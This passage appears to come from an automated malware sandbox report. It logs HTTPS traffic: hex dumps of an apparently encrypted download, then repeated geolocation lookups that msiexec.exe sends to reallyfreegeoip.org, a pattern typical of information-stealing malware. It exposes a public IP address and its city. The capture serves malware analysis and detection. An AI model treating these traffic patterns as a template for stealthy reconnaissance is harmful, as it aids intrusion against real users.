                                                                                                                          Data Ascii: sVsCP]w["= k 0,#B_Ij,g@Pk#?2{W,RTkm9qcY+WcrBw4w"FO@zhy>q5m)V5+~ p* 'Ay)Pr>V&)+{(9;"Z|L
                                                                                                                          2024-10-22 14:11:59 UTC4890INData Raw: 80 19 a0 83 8c 25 03 c7 5b ec d1 8b 98 39 8d 74 58 24 6c 1a 0d 90 6a b7 2d 42 19 2a 90 a3 83 f2 2b b0 64 b6 0c 66 1f 69 6c 99 05 ec a2 8a fd d6 89 1f 40 88 2d 9e 95 9c cf bc c2 40 86 81 b5 6f e4 90 fc d9 2d 5a d2 d5 45 b2 41 2e 42 37 d5 f2 b0 fc b9 a4 23 fc de a7 09 2b f2 7f 2d 15 3e 3c e7 bc 89 5a 6d 09 72 47 fb db a5 77 da 34 3e 91 28 c8 78 d4 43 24 ee 22 89 06 b3 f7 0d d5 ef c8 62 94 63 e1 b8 c4 8f c0 0c 50 63 3d 13 d3 bc 12 22 f4 f5 3f a8 fa 25 9a 32 4b e6 bd 0a cf c2 9d 0b 56 5d 8e 32 ba 09 09 91 91 bb 34 97 c5 2c 78 25 88 bd bc 79 85 ea 08 5c 7b 12 e0 71 f6 f6 3e 3b 92 99 79 e8 a7 44 63 75 2f 4f 06 3f 16 1c 38 60 af 79 c1 92 1e fd d9 bc 3f ae 1e a1 12 69 d1 e5 25 6e a4 4a 92 65 ac b1 5b 6d 9b 14 60 1e f6 00 cd 9d ea 5d 10 40 2e df 72 6d 3f 93 36 76
                                                                                                                          Data Ascii: %[9tX$lj-B*+dfil@-@o-ZEA.B7#+-><ZmrGw4>(xC$"bcPc="?%2KV]24,x%y\{q>;yDcu/O?8`y?i%nJe[m`]@.rm?6v
                                                                                                                          2024-10-22 14:11:59 UTC27INData Raw: 4f f3 0e bb 02 e4 94 24 e6 ec 05 b7 fa 70 47 93 56 5f b6 e8 4e 5c 7f 5d c5 64 40
                                                                                                                          Data Ascii: O$pGV_N\]d@
                                                                                                                          2024-10-22 14:11:59 UTC1324INData Raw: 2f f6 f8 62 99 7e d3 ad 1d e0 0b 05 a0 3a 00 83 01 7d d8 90 90 65 31 81 20 ed f7 de 77 80 ee ea 08 f4 c0 c7 3c 97 77 f9 c9 21 44 bf 3e 68 76 2a 0c 53 aa b0 96 00 53 53 a4 34 21 33 96 4e 3b bd 28 8e c8 d6 ee be 1e 09 19 2b d4 b2 d4 3d 87 4c 6c 36 7e 3e e1 a3 8c f4 27 e7 00 95 fd 19 e3 82 5d ba 5b 39 57 cd 78 0a 82 68 32 8f 97 5b 8b 7d 50 88 e3 e4 b4 4a 7b c4 61 e8 5b b4 43 8d 3d 16 86 fe 71 d4 55 7e 8b ee 6c 75 48 87 36 6d 96 7f 02 b1 5b ef 07 e1 b4 5b 5b f3 58 0f 6e 4b 6f 74 27 dd 71 b4 8f 70 42 07 bc 2c cb de 1a da 59 c4 bc b3 01 2c 02 0e c5 17 14 66 b2 ae 63 f5 67 7c cc 14 cf 91 db 54 49 45 5c 01 2c b4 e4 d7 83 5f ba f6 7d e5 f4 85 b3 77 e1 98 5a 09 e1 ce e6 26 db 40 a0 05 11 6c a7 ad 2f ea 76 c4 04 6b 5d 18 a2 c6 f9 6f 73 ca cd 7d 25 e2 d8 83 bc a5 eb
                                                                                                                          Data Ascii: /b~:}e1 w<w!D>hv*SSS4!3N;(+=Ll6~>'][9Wxh2[}PJ{a[C=qU~luH6m[[[XnKot'qpB,Y,fcg|TIE\,_}wZ&@l/vk]os}%
                                                                                                                          2024-10-22 14:11:59 UTC1378INData Raw: 68 fb f0 04 dd 82 20 8e 0a c9 b3 d5 2a 5d b0 72 cc e1 ce 00 2d 6c 2c 8e b8 8b 74 bc c2 3e 0d 90 44 b1 26 96 2c d1 a2 45 9c 98 6a b2 57 d2 e0 8f 47 6e 95 de e1 2e ed 57 60 27 5d 29 f4 13 3e eb 91 cb 1f e4 6e 1b 28 51 d3 57 6e fb 67 24 16 f7 e6 d3 c2 f9 30 62 07 1d a7 74 b3 cd e1 a7 a9 c8 14 50 11 f5 26 cc 02 e4 9e 5a d4 92 3a b3 88 23 54 b2 54 5b 8d 69 3e 22 6a 4b 3b 61 7b 60 e7 fe 51 4b 5e ad ed 63 cf 0f 2d 9a 48 31 87 01 d3 de 9d 39 51 31 8b 3c 00 d5 cd 58 f3 e9 d3 32 2b c0 c7 3c 83 f7 c8 f4 21 40 cb 1a aa 76 5a 10 53 ea b0 96 00 45 de 67 27 05 28 a1 6a 76 a8 db f4 c8 d6 eb e8 cb 7b 7d 2e bb 06 76 18 9a 64 c9 3e 11 f1 43 86 9e f8 64 e8 00 e1 30 fa fa fc 6f ba 4a 35 87 62 72 78 50 4f 86 ff 35 74 e2 a3 6a 88 93 c8 4d 6f 67 bc be 20 5b c4 eb a5 59 1e 9b 79
                                                                                                                          Data Ascii: h *]r-l,t>D&,EjWGn.W`'])>n(QWng$0btP&Z:#TT[i>"jK;a{`QK^c-H19Q1<X2+<!@vZSEg'(jv{}.vd>Cd0oJ5brxPO5tjMog [Yy
                                                                                                                          2024-10-22 14:11:59 UTC1378INData Raw: 4b 0d c9 5c 7b 00 3f bd 0c da ae 6c 0e 32 79 69 ee 0f d6 ae a6 ee 31 40 34 73 76 26 1a 00 53 53 76 c5 e0 d3 a6 45 12 61 fe 9e c5 7d 19 b1 83 e0 c4 3e 84 2f b1 2b 89 38 3c a2 39 3d ac 40 22 2c 3d 72 03 2c 63 cf 20 79 89 43 03 cb 9d 48 ab 11 bd 99 d5 3b 51 6c 69 d0 93 7a 27 e6 1c 8e ac a2 47 74 b6 a7 62 1c 98 30 98 07 8d a5 ef 99 45 9d b9 0f 7c b3 c0 ea 90 28 4b 82 fc 55 3f e5 4c c4 6d 8b 5b 8a 16 3e 8a 35 81 c9 9a 56 11 28 7d 15 72 74 8f 5c f9 06 a2 6c cf b7 f9 3a 7b 1e 3f 99 3e c5 cd eb 73 a9 e8 14 5c 6f c0 0e bb 06 96 c3 58 d4 9c 13 9b 09 27 45 99 30 b7 9f 7a 45 4d 7e 72 f0 64 53 29 99 d5 5b 5a 78 fb 46 63 cf 01 16 a8 36 07 81 01 09 bc 9a 00 65 41 9d 1e 92 f6 cd 7a 87 17 d2 2b f8 d1 ca 05 5a 89 ff f4 37 6c cf 4d a8 7c 2a 26 7b 67 b0 96 22 24 20 66 3e 21
                                                                                                                          Data Ascii: K\{?l2yi1@4sv&SSvEa}>/+8<9=@",=r,c yCH;Qliz'Gtb0E|(KU?Lm[>5V(}rt\l:{?>s\oX'E0zEM~rdS)[ZxFc6eAz+Z7lM|*&{g"$ f>!
                                                                                                                          2024-10-22 14:11:59 UTC1378INData Raw: 6c bd 8b 73 7c 4e c6 86 28 c5 23 c8 2c b4 c7 6a 45 d9 8f ee 30 df ed ec fb be 79 21 57 1b 1d e7 14 5b 44 3e 79 5b f1 b8 b3 b5 f8 95 3b 69 43 90 0a 64 82 53 dc 88 c1 19 93 0e a1 4a 37 57 cb 4d 9c 77 af fb a6 3b a7 4b 56 20 5c 7b 0c 43 03 1d dc cb cf 16 27 73 08 c1 3b 05 ae ac 9a 7a 3e 08 77 5e 68 69 c9 59 2d 63 d6 e8 a9 bf 0f 12 65 86 6b d3 69 7d 8f 11 61 c4 34 fa ba 4f 2a 9b 3d 2d a3 67 b1 ad 48 45 2c 4c 72 03 2c 63 c7 75 30 89 52 0f a3 b1 82 ab 15 c4 25 d5 2a 53 7d ea d0 93 74 0f 05 46 8e a6 c7 96 f9 f6 ad 62 0c b5 58 d0 0b 98 a1 e1 00 60 8a 95 c8 c0 b3 ca 42 da fd 39 fc f9 55 5e 4f 78 db 7c 7d 5b 8a 18 9c be 29 9c a4 95 56 6b 8a 70 6a 0c 68 89 5c 23 79 69 44 fb bd 5b 15 74 66 07 a5 5c b5 6f c9 d8 a9 e8 1e 33 4d f5 0e b1 0f ec 9d d4 bd 86 6a 0d 88 27 4f
                                                                                                                          Data Ascii: ls|N(#,jE0y!W[D>y[;iCdSJ7WMw;KV \{C's;z>w^hiY-ceki}a4O*=-gHE,Lr,cu0R%*S}tFbX`B9U^Ox|}[)Vkpjh\#yiD[tf\o3Mj'O
                                                                                                                          2024-10-22 14:11:59 UTC1378INData Raw: a4 44 13 eb 7b cb 14 f6 d4 c3 8c e1 34 96 48 3f d3 1d 7d 24 fc e7 76 f7 7c 1f 48 aa ca 22 67 d1 20 31 19 5a 65 79 a2 db d2 45 c1 37 12 5b 84 8b 8d d5 ec 21 31 89 9d ba a2 7c f2 5a f8 c1 a7 a6 53 08 ec fd 01 63 b6 39 bc dd b7 7c 4e c8 32 f3 de 5b 12 04 16 b0 42 05 a7 bc e8 92 fe 86 c5 bf be 09 33 dd bf 07 95 16 5f ba 4f d0 79 d3 87 3f f5 f8 81 ea 19 55 e2 81 5c af 23 7e a7 a4 73 37 0e d1 57 18 71 d3 3f 1f 47 b9 f5 40 1e be 67 ca 24 5c 71 a8 09 a0 6f b8 d3 bd 7e 90 5b 0d e9 60 0f 0c 8e 91 31 3e 02 60 68 50 a3 dc 53 23 02 c9 e8 ad 93 6d 5b 65 8c c3 b5 c5 7b a7 db 49 86 3e 8e 3f 5e 34 8b 25 05 ef 15 31 bb 48 e8 c2 f6 72 03 03 4b fb 0b 72 83 41 14 dd da e0 ab 11 bd 47 d5 2a 59 12 57 ae a7 7e 0f 29 6e d9 a4 cd fb 62 9e 2c 62 0d 9a 58 5c 06 9e 81 80 82 7c 4e bd
                                                                                                                          Data Ascii: D{4H?}$v|H"g 1ZeyE7[!1|ZSc9|N2[B3_Oy?U\#~s7Wq?G@g$\qo~[`1>`hPS#m[e{I>?^4%1HrKrAG*YW~)nb,bX\|N
                                                                                                                          2024-10-22 14:11:59 UTC1378INData Raw: 5c 32 e0 32 b3 6c a3 96 8e a1 b9 16 c9 2c 70 66 ea b4 d3 72 85 ed 05 33 c1 cc f3 5e d9 ad 59 3b 98 80 12 80 8f 26 69 79 25 e1 0c 39 16 16 2b 64 af 16 f7 9a 09 8a c1 eb 3d a4 7d b2 3a f9 d4 96 44 78 5a 41 92 66 ac b2 60 c8 f5 14 60 6a d9 de c3 99 89 6a 3e 48 4f cf 35 ed 3f 93 36 60 09 77 0c 4e 83 0f 1b 57 d0 20 31 0f 66 ed 7f 9f d1 d2 63 b2 fb 12 5b a6 d4 4c d5 e6 2b 2d 77 1f ba a2 77 c4 4b 9b 7b d2 9c 23 20 a9 8e c2 65 14 16 c4 67 f2 7c 44 cc 81 d1 a9 ec ce 15 1c be 57 45 a7 b8 81 f6 db 9f b1 f9 af 0e 45 f5 8a 1d 97 36 f9 ba 3f 78 2e 68 8c b2 c5 d0 da eb 3c 49 ff cc 4c af 59 dc 93 b4 46 0e 4e d1 5d bb 71 dd 3f b1 44 b9 f5 40 1e b0 67 ca 24 5c 71 a8 09 a2 6f a2 ce bd 7e 90 56 61 97 58 05 ae a2 46 14 24 7a 48 75 22 19 6b 76 48 02 f6 e8 ad 93 e7 37 79 fe f1
                                                                                                                          Data Ascii: \22l,pfr3^Y;&iy%9+d=}:DxZAf``jj>HO5?6`wNW 1fc[L+-wwK{# eg|DWEE6?x.h<ILYFN]q?D@g$\qo~VaXF$zHu"kvH7y
                                                                                                                          2024-10-22 14:11:59 UTC1378INData Raw: 5d 7f 2d 1f 54 18 ff ce f9 55 6d 79 d0 62 e2 a5 9d 77 da 30 9d b4 32 ba 94 d6 43 54 94 06 92 78 83 f7 0d d1 08 ed 7e e7 40 c7 bb b4 9c e8 79 50 70 37 7c 9e bc 12 00 84 d7 24 2f b1 22 b2 69 6e f0 c5 43 b7 9e ed a9 79 25 c2 86 ba 03 03 34 ab b3 cb b6 ca 2c 09 e8 c8 a4 c2 4b 85 ed 0b 91 38 08 92 40 f2 99 29 99 ba e6 16 80 ad 57 4a 6f 07 4a 6f 3f 1c 16 0b 64 a3 68 c5 b2 7e 8e b3 b6 3f a4 73 9b 12 78 d0 87 6c 1c ce 57 81 13 c3 a8 59 02 f3 3c 29 14 f6 d4 d2 be 85 1b 3c 48 3b f1 23 6c 3f 95 3c a8 e7 53 37 7c 92 09 28 74 f5 20 19 6d 72 13 73 7c d1 d2 65 c1 45 25 5b ac f8 ff 82 e4 21 5d 12 f5 3b a2 7d dd 5a 74 7d bf 83 32 05 81 a1 1c e8 54 1c ab a2 d7 6a 3c e0 86 d6 b6 8b eb 02 3e 74 6a 45 ad 1e cb 28 a9 e1 b4 f9 ce ab 12 66 e4 25 e7 1e 49 18 1a 68 2e f3 9f b2 c5
                                                                                                                          Data Ascii: ]-TUmybw02CTx~@yPp7|$/"inCy%4,K8@)WJoJo?dh~?sxlWY<)<H;#l?<S7|(t mrs|eE%[!];}Zt}2Tj<>tjE(f%Ih.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.649992188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:04 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:04 UTC895INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:04 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31680
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X2GJF%2BNOvrBe5IL7%2F4VAJDw6aOyquP7yB8Ff55gYV76WdVnoj7GINEhjJ1vKSFJiLlZQMrj5r67FlVr9GKvSARzQw5sXrsnztc%2BI89aEXU3trZJ1rIVFePdX0I5dIv%2FO4S29sG1Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14872ba3465f-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=989&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2806201&cwnd=247&unsent_bytes=0&cid=44a4f90c91f50a49&ts=162&x=0"
                                                                                                                          2024-10-22 14:12:04 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.649993188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:05 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-10-22 14:12:05 UTC908INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:05 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31681
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14rub%2FvgsZNu7q1l7Dn3OUXr1o6U%2FrQU8qmxrKxQ8%2BujUlpqPgJjl9D%2Fg91FNrymQV%2FQFJl%2FhCf%2BQqTe3GwRG9zMYnJKcSnmcKtb4C7TgAVQ%2FqO%2F6xDCs%2FQ96bKa3yZfZ7HCUM7U"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a148d88d86b9a-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1274&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2220858&cwnd=226&unsent_bytes=0&cid=9cfb64ec4d1406c1&ts=154&x=0"
                                                                                                                          2024-10-22 14:12:05 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.649994188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:05 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:05 UTC894INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:05 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31681
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TySsJ7rSEMJwL5X8sZZrxErADDYwQUv4jhFfy04h7MXwXBsdp4uGnU0f3sIOo5a%2FkatSq7P4MRem%2FpZZrcyRNNs5lZWczNNFAtZx8wHGBBpegYhvB92JXzz%2FDnwZfe0wAvObU97j"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a148ed9426b61-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1289&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2118507&cwnd=251&unsent_bytes=0&cid=192de139eb74c059&ts=173&x=0"
                                                                                                                          2024-10-22 14:12:05 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.649996188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:06 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-10-22 14:12:06 UTC894INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:06 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31682
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tz5SowAvXuWRVCRi8r2iKBGNDVwoa3JUXFnbQgIm1j6rtGcDg2nn84DH%2Fd0toAIN2Wq0kTjdDT9iXUcRwc7%2F9w581WmAFW8FVSHcuu%2BTSIvT2gWOxDEzChO2KVExFrUpEwV3R53m"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14960d7f2caa-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1448&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1450901&cwnd=251&unsent_bytes=0&cid=9b7f62fdd6adbb58&ts=154&x=0"
                                                                                                                          2024-10-22 14:12:06 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.649997188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:07 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:07 UTC892INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:07 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31683
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I9zuzq2elAO0Q%2BFjG94jG5uS0bHlKXxqH1nX87XWTidAQ4wmcdDRvBMIF8lgUk5CR19DR5tlcT5lRACndbV6TgHCEg5UHywauSwvdMg4SVDcAfV6YpS5y0Ls5FpUSekO5%2BWn7ipo"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a149868dbe742-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1385645&cwnd=245&unsent_bytes=0&cid=9a096c1be6c26561&ts=160&x=0"
